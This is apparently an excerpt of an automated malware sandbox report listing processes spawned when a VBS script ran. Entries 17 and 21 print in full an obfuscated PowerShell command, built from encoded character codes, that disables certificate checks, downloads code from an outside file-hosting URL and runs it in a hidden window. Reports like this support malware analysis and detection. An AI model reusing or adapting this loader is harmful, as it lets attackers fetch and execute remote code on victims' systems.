                                                                      Target ID:8
                                                                      Start time:04:42:39
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6e60e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:04:42:39
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs"
                                                                      Imagebase:0x8e0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                      Target ID:10
                                                                      Start time:04:42:39
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6e60e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:11
                                                                      Start time:04:42:39
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs"
                                                                      Imagebase:0x5a0000
                                                                      File size:147'456 bytes
                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                      Target ID:17
                                                                      Start time:04:43:05
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
                                                                      Imagebase:0x8e0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:04:43:05
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6e60e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:21
                                                                      Start time:04:43:05
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwXZtAwej) "
                                                                      Imagebase:0x8e0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:04:43:05
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
                                                                      Imagebase:0x890000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                      No disassembly